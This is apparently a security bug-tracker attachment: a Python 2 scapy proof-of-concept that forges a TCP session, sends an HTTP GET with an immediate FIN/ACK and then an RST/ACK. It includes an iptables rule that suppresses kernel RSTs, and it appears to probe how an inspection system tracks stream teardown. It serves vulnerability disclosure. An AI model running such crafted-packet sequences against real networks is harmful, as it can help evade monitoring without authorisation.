Project

General

Profile

Security #2770 » poc.py

Alexey Vishnyakov, 01/14/2019 11:51 AM

 
from scapy.all import *

'''
Note: linux might send an RST for forged SYN packets. Disable it by executing:
#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
'''

dst = "192.168.56.1"
dport = 8080
sport = random.randint(1024,65535)
seq = random.randint(1, 50000)

pkt = IP(dst = dst)

# 3whs start

# SYN
pkt_syn = pkt/TCP(sport = sport, dport = dport, seq = seq, flags = 'S')

# SYN/ACK
pkt_syn_ack = sr1(pkt_syn, verbose = 0)

# ACK
seq += 1
if pkt_syn_ack.ack != seq:
print 'Bad ACK number !'

ack = pkt_syn_ack.seq + 1
pkt_ack = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'A')
send(pkt_ack)

# 3whs end

http_req = '\r\n'.join(['GET /index.html HTTP/1.1'
,'Host: {}'.format(dst)
,'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'
,'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
,'Accept-Language: en-US,en;q=0.5'
,'Accept-Encoding: gzip, deflate'
,'Connection: keep-alive'
,'\r\n'])

pkt_http_req = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'AP')/http_req
pkt_fin_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req), ack = ack, flags = 'AF')

# Send GET request
send(pkt_http_req)
# Send FIN/ACK just after GET request
send(pkt_fin_ack)

# Receive GET answer
pkt_http_resp = sniff(filter = 'tcp', count = 1)
print str(pkt_http_resp[0].payload)[40:]

# Send RST/ACK after response
pkt_rst_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req) + 1, ack = ack + len(str(pkt_http_resp[0].payload)[40:]), flags = 'AR')
send(pkt_rst_ack)
(2-2/3)